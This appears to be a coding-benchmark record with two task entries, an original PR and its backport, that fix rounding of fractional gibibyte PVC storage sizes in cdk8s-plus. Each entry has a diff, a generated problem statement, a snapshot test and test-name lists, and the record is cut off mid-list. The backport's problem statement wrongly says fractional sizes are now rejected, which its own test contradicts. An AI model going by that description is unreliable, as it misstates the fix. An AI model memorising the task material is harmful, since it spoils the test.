diff --git a/src/pvc.ts b/src/pvc.ts index 25c133ae..5c23eec2 100644 --- a/src/pvc.ts +++ b/src/pvc.ts @@ -1,4 +1,4 @@ -import { Size, ApiObject, Lazy } from 'cdk8s'; +import { Size, SizeRoundingBehavior, ApiObject, Lazy } from 'cdk8s'; import { Construct } from 'constructs'; import * as base from './base'; import * as k8s from './imports/k8s'; @@ -197,7 +197,9 @@ export class PersistentVolumeClaim extends base.Resource implements IPersistentV * @internal */ public _toKube(): k8s.PersistentVolumeClaimSpec { - const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes() + 'Gi') : undefined; + const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes({ + rounding: SizeRoundingBehavior.NONE, + }) + 'Gi') : undefined; return { volumeName: this.volume ? this.volume.name : undefined, accessModes: this.accessModes?.map(a => a.toString()),
fix(pvc): fractional gibibytes storage sizes are not allowed Fixes https://github.com/cdk8s-team/cdk8s/issues/2511
**Title** Prevent unintended rounding of fractional gibibyte storage sizes in PVCs **Problem** When a PersistentVolumeClaim specifies a storage size that is not a whole gibibyte, the conversion to a Kubernetes quantity automatically rounded the value. This produced incorrect PVC specifications and broke expectations for users needing precise fractional sizes. **Root Cause** The size‑to‑Gi conversion used the default rounding behavior, which rounds to the nearest integer before forming the quantity string. **Fix / Expected Behavior** - Convert storage sizes to gibibytes with rounding disabled. - Preserve any fractional component in the resulting quantity string. - Emit PVC manifests that contain the exact size requested by the user. - Keep existing handling for cases where no storage size is defined. - Leave all other PVC fields and behavior unchanged. **Risk & Validation** - Verify that generated PVC manifests now include fractional “Gi” values and are accepted by Kubernetes. - Add or update unit tests for both whole‑number and fractional storage sizes to ensure correct conversion. - Confirm that other parts of the library that rely on size conversion continue to work with the new rounding option.
5,681
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/pvc.test.ts.snap b/test/__snapshots__/pvc.test.ts.snap index 90a908d2..fe7599ca 100644 --- a/test/__snapshots__/pvc.test.ts.snap +++ b/test/__snapshots__/pvc.test.ts.snap @@ -100,3 +100,23 @@ Array [ }, ] `; + +exports[`small size 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "PersistentVolumeClaim", + "metadata": Object { + "name": "test-persistentvolumeclaim-c8af0974", + }, + "spec": Object { + "resources": Object { + "requests": Object { + "storage": "0.5Gi", + }, + }, + "volumeMode": "Filesystem", + }, + }, +] +`; diff --git a/test/pvc.test.ts b/test/pvc.test.ts index 3b1c1bec..e0619c7f 100644 --- a/test/pvc.test.ts +++ b/test/pvc.test.ts @@ -49,6 +49,19 @@ test('custom', () => { }); +test('small size', () => { + + const chart = cdk8s.Testing.chart(); + const pvc = new kplus.PersistentVolumeClaim(chart, 'PersistentVolumeClaim', { + storage: cdk8s.Size.mebibytes(512), + }); + + expect(pvc.storage).toEqual(cdk8s.Size.mebibytes(512)); + + const resources = cdk8s.Testing.synth(chart); + expect(resources).toMatchSnapshot(); +}); + test('can be imported', () => { const chart = Testing.chart();
[ "small size" ]
[ "defaultChild", "default configuration", "custom configuration", "Can be isolated", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaults", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can mutate metadata", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "fromCommand", "fromHttpGet", "fromTcpSocket", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "ajacques", "pr_labels": [ "backport-to-k8s-30/main: Backport a PR to the k8s-30 branch", "backport-to-k8s-31/main: Backport a PR to the k8s-31 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s/issues/2511" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests allowing fractional GiB storage sizes for PersistentVolumeClaims, and the test adds a case using 512 Mi (0.5 Gi) expecting the manifest to contain \"0.5Gi\". The provided test aligns with the intended behavior and does not introduce unrelated expectations. No signals of test-suite coupling, implicit naming, external dependencies, ambiguity, unrelated patch artifacts, or implicit knowledge are present, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
54125191b08276e5165d67674b395ad6c9cc76c6
2025-05-07 15:40:53
cdk8s-team__cdk8s-plus-5707
diff --git a/src/pvc.ts b/src/pvc.ts index 25c133ae..5c23eec2 100644 --- a/src/pvc.ts +++ b/src/pvc.ts @@ -1,4 +1,4 @@ -import { Size, ApiObject, Lazy } from 'cdk8s'; +import { Size, SizeRoundingBehavior, ApiObject, Lazy } from 'cdk8s'; import { Construct } from 'constructs'; import * as base from './base'; import * as k8s from './imports/k8s'; @@ -197,7 +197,9 @@ export class PersistentVolumeClaim extends base.Resource implements IPersistentV * @internal */ public _toKube(): k8s.PersistentVolumeClaimSpec { - const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes() + 'Gi') : undefined; + const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes({ + rounding: SizeRoundingBehavior.NONE, + }) + 'Gi') : undefined; return { volumeName: this.volume ? this.volume.name : undefined, accessModes: this.accessModes?.map(a => a.toString()),
fix(pvc): fractional gibibytes storage sizes are not allowed (backport #5681) # Backport This will backport the following commits from `k8s-32/main` to `k8s-30/main`: - [fix(pvc): fractional gibibytes storage sizes are not allowed (#5681)](https://github.com/cdk8s-team/cdk8s-plus/pull/5681) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Prevent fractional gibibyte storage sizes in PersistentVolumeClaim specifications **Problem** Kubernetes PersistentVolumeClaims accept storage sizes only as whole gibibytes. The library previously allowed fractional Gi values, which results in invalid manifests being generated. **Root Cause** The size conversion routine rounded fractional values implicitly, silently producing non‑integer Gi strings. **Fix / Expected Behavior** - Storage size conversion now disables automatic rounding. - Attempting to specify a fractional Gi size triggers a validation error instead of producing an invalid manifest. - Only whole‑Gi sizes are accepted and emitted in the PVC definition. - Existing non‑fractional size handling remains unchanged. **Risk & Validation** - Verify that PVC manifests with whole‑Gi sizes continue to render correctly. - Add tests to confirm that fractional Gi inputs are rejected with an appropriate error. - Ensure no side‑effects on other constructs that rely on size conversion.
5,707
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/pvc.test.ts.snap b/test/__snapshots__/pvc.test.ts.snap index 90a908d2..fe7599ca 100644 --- a/test/__snapshots__/pvc.test.ts.snap +++ b/test/__snapshots__/pvc.test.ts.snap @@ -100,3 +100,23 @@ Array [ }, ] `; + +exports[`small size 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "PersistentVolumeClaim", + "metadata": Object { + "name": "test-persistentvolumeclaim-c8af0974", + }, + "spec": Object { + "resources": Object { + "requests": Object { + "storage": "0.5Gi", + }, + }, + "volumeMode": "Filesystem", + }, + }, +] +`; diff --git a/test/pvc.test.ts b/test/pvc.test.ts index 3b1c1bec..e0619c7f 100644 --- a/test/pvc.test.ts +++ b/test/pvc.test.ts @@ -49,6 +49,19 @@ test('custom', () => { }); +test('small size', () => { + + const chart = cdk8s.Testing.chart(); + const pvc = new kplus.PersistentVolumeClaim(chart, 'PersistentVolumeClaim', { + storage: cdk8s.Size.mebibytes(512), + }); + + expect(pvc.storage).toEqual(cdk8s.Size.mebibytes(512)); + + const resources = cdk8s.Testing.synth(chart); + expect(resources).toMatchSnapshot(); +}); + test('can be imported', () => { const chart = Testing.chart();
[ "small size" ]
[ "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "defaultChild", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Can mutate metadata", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "fromCommand", "fromHttpGet", "fromTcpSocket", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "default configuration", "custom configuration", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "fails with two volumes with the same name", "fails adding 